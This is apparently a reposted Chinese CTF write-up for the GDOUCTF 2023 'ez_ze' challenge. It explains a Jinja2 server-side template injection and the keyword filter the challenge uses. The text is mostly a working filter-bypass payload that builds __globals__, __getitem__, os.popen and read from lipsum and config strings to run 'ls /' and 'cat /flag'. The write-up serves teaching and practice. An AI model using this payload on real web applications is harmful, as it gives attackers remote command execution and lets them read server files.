首页 > 其他分享 >[GDOUCTF 2023]<ez_ze>!

[GDOUCTF 2023]<ez_ze>!

时间:2024-09-12 22:26:20浏览次数:1  
标签:xia set join attr pop dict 2023 GDOUCTF

这题是一个jinja2的ssti模板注入,经过测试过滤了
_ {{}} . [] '' os popen getitem
输入{% print(lipsum|string|list) %}或者{% print(config|string|list) %}


从这里面获取我们需要的字符
获取下划线和空格

{% set pop=dict(pop=1)|join %}
{% set xia=(lipsum|string|list)|attr(pop)(18) %}        //下划线
{% set kong=(lipsum|string|list)|attr(pop)(9) %}        //空格

获取斜杆

{% set pop=dict(pop=1)|join %}
{% set xie=(config|string|list)|attr(pop)(239) %}

然后就是构造 globals
{% set globals=(xia,xia,dict(globals=a)|jion,xia,xia)|jion %}
构造 getitem
{% set geti=(xia,xia,dict(get=a,item=b)|jion,xia,xia)}
执行

{% set pop=dict(pop=1)|join %}													
{% set kong=(lipsum|string|list)|attr(pop)(9) %}								 
{% set xia=(lipsum|string|list)|attr(pop)(18) %}								 
{% set xie=(config|string|list)|attr(pop)(239) %}								 
{% set globals=(xia,xia,dict(globals=a)|join,xia,xia)|join %}					 
{% set geti=(xia,xia,dict(get=a,item=b)|join,xia,xia)|join %}					 
{% set o=dict(o=a,s=b)|join %}													 
{% set po=dict(pop=a,en=b)|join %}												 
{% set cmd=(dict(ls=a)|join,kong,xie|join)|join %}								 
{% set read=dict(read=a)|join %}												 
{% print(lipsum|attr(globals)|attr(geti)(o)|attr(po)(cmd)|attr(read)()) %}

解释

{% set pop=dict(pop=1)|join %}													
{% set kong=(lipsum|string|list)|attr(pop)(9) %}								kong=空格
{% set xia=(lipsum|string|list)|attr(pop)(18) %}								xia=_
{% set xie=(config|string|list)|attr(pop)(239) %}								xie=/
{% set globals=(xia,xia,dict(globals=a)|join,xia,xia)|join %}					globals=__globals__
{% set geti=(xia,xia,dict(get=a,item=b)|join,xia,xia)|join %}					geti=__getitem__
{% set o=dict(o=a,s=b)|join %}													o=os
{% set po=dict(pop=a,en=b)|join %}												po=popen
{% set cmd=(dict(ls=a)|join,kong,xie|join)|join %}								cmd=ls /
{% set read=dict(read=a)|join %}												read=read
{% print(lipsum|attr(globals)|attr(geti)(o)|attr(po)(cmd)|attr(read)()) %}


最后修改一下命令就可以了
最后的payload:

{% set pop=dict(pop=1)|join %}													
{% set kong=(lipsum|string|list)|attr(pop)(9) %}								 
{% set xia=(lipsum|string|list)|attr(pop)(18) %}								 
{% set xie=(config|string|list)|attr(pop)(239) %}								 
{% set globals=(xia,xia,dict(globals=a)|join,xia,xia)|join %}					 
{% set geti=(xia,xia,dict(get=a,item=b)|join,xia,xia)|join %}					 
{% set o=dict(o=a,s=b)|join %}													 
{% set po=dict(pop=a,en=b)|join %}												 
{% set cmd=(dict(cat=a)|join,kong,xie,dict(flag=b)|join)|join %}								 
{% set read=dict(read=a)|join %}												 
{% print(lipsum|attr(globals)|attr(geti)(o)|attr(po)(cmd)|attr(read)()) %}

标签:xia,set,join,attr,pop,dict,2023,GDOUCTF
From: https://www.cnblogs.com/lcmz/p/18411238

相关文章

  • YOLOv8改进 | 模块缝合 | C2f 融合SCConv提升检测性能【CVPR2023】
    秋招面试专栏推荐 :深度学习算法工程师面试问题总结【百面算法工程师】——点击即可跳转......
  • 喜报 | 新突破!望繁信科技荣获2023上海市“专精特新”企业认证
    上海市经济和信息化委员会公示了2023年上海市“专精特新”企业名单(第二批)。望繁信科技凭借先进的技术能力、持续的研发投入和创新,经过层层专家评审和综合评估,成功获得上海市“专精特新”企业认证。“专精特新”是国家为引导中小企业走上“专业化、精细化、特色化、新颖化”发展之路......
  • 蜜蜂舞动全球舞台:2023年我国蜂产品年产值已突破500亿元大关,实现了从数量大国向质量强
        在北京密云这片绿意盎然的土地上,一场关于小蜜蜂与大产业的盛会——2024年国际蜂联亚洲区域研讨会圆满落下帷幕。这场由中国农业科学院蜜蜂研究所主办的盛会,不仅汇聚了来自33个国家和地区的蜂业精英,更成为了全球蜂业共谋发展、应对挑战的重要平台。中国蜂业:从数量到质量......
  • 【2023年】云计算金砖牛刀小试3
    A场次题目:OpenStack平台部署与运维业务场景:某企业拟使用OpenStack搭建一个企业云平台,用于部署各类企业应用对外对内服务。云平台可实现IT资源池化,弹性分配,集中管理,性能优化以及统一安全认证等。系统结构如下图:企业云平台的搭建使用竞赛平台提供的两台云服务器,配置如下表:......
  • CSP-S 2023
    T1直接\(10^{5}\)枚举状态就过了,合法的非零差分数量只可能为\(1,2\)(\(0\)相当于没转,按照题意“都不是正确密码”是不符的)需要注意的是形如09111->10111这样的合法状态#include<bits/stdc++.h>usingnamespacestd;intn;inta[10][9];intp[6];boolche......
  • CSP-S 2023 游记
    在CSP-S2024来临之际,补一下CSP-S2023游记CSP-S开题顺序:T1+T2+T4+T3时间分配:T130min,T21h,T42h,T330min场上即兴考试思路:快速切T1,死磕T2(没想到1h就想到了),接着T4试着AC(然后就深陷其中,红温了),T3场上忘了。T1正常发挥,T2其实也挺谁的,想到\(O(n^2)\)做法就一个......
  • 深入探索从ES6到ES2023
    从ES6到ES2023,我们深入探索ECMAScript(简称ES)的演变与发展,了解这一JavaScript标准背后的技术革新和进步。ECMAScript作为JavaScript的标准化版本,每年都在不断推出新版本,为开发者带来更加丰富和强大的功能。本文将从ES6的引入开始,逐步介绍到最新的ES2023,同时探讨这些新特性对......
  • MATLAB R2023b下载安装教程超详细的图文教程来了
    MATLABR2023b下载安装教程超详细的图文教程来了,MATLAB2023版在多个方面有显著提升。性能上,计算速度优化,大规模矩阵运算等执行更快,节省时间和资源;内存管理改进,减少内存泄漏和碎片化,提高程序稳定性。图形和可视化功能增强,高质量图形渲染使图像更清晰准确;新增交互式可视化工......
  • [COCI2022-2023#2] Tramvaji
    [COCI2022-2023#2]Tramvaji题意对于每个车站\(i\),给出一条信息。从车站\(j<i\)到车站\(i\)花费了时间\(t\)。求出哪两个站之间花费的时间最少。思路考虑求出\(s_i\)表示从\(1\)到\(i\)的最少时间。答案即\(\min_{i=2}^{n}s_i-s_{i-1}\)。对于给出的信息\(......
  • 一键下载,轻松应对工作挑战:Adobe InDesign 2023 最新版软件下载
    ##一键下载,轻松应对工作挑战:AdobeInDesign2023最新版软件下载在当今快节奏的工作环境中,效率和便捷性是成功的关键。无论是设计师、出版商还是营销人员,都需要一款功能强大且易于使用的排版软件来应对各种工作挑战。AdobeInDesign2023正是这样一款软件,它凭借其强大的功能和不......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99